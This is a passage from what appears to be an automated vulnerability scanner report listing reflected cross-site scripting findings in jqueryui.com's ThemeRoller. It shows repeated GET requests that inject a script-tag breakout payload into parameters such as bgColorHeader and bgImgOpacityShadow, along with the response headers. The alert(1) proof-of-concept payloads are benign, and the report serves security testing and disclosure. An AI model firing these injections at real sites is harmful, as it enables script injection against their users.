Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87fef"><script>alert(1)</script>4b472d7ef35 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc87fef"><script>alert(1)</script>4b472d7ef35&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac242"><script>alert(1)</script>71aa1498cfe was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9eeac242"><script>alert(1)</script>71aa1498cfe&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64e26"><script>alert(1)</script>1a3124de35d was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada64e26"><script>alert(1)</script>1a3124de35d&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e4f1"><script>alert(1)</script>409c40fb7a8 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa1e4f1"><script>alert(1)</script>409c40fb7a8&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6e9c"><script>alert(1)</script>97a66de1e5d was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaad6e9c"><script>alert(1)</script>97a66de1e5d&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload effe2"><script>alert(1)</script>ea171b4358b was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65effe2"><script>alert(1)</script>ea171b4358b&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37be1"><script>alert(1)</script>2443dcf35 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=7537be1"><script>alert(1)</script>2443dcf35&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120061
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf69"><script>alert(1)</script>f530c1d1079 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753cf69"><script>alert(1)</script>f530c1d1079&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b812"><script>alert(1)</script>7ded0019f81 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=955b812"><script>alert(1)</script>7ded0019f81&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:17 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 465c6"><script>alert(1)</script>ee3c1ef3667 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75465c6"><script>alert(1)</script>ee3c1ef3667&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b74b"><script>alert(1)</script>e7031a0cc1 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=554b74b"><script>alert(1)</script>e7031a0cc1&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb22a"><script>alert(1)</script>8dcb00c57c8 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75fb22a"><script>alert(1)</script>8dcb00c57c8&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7294b"><script>alert(1)</script>0b2f30c780e was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=07294b"><script>alert(1)</script>0b2f30c780e&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef8af"><script>alert(1)</script>bb639f52f51 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
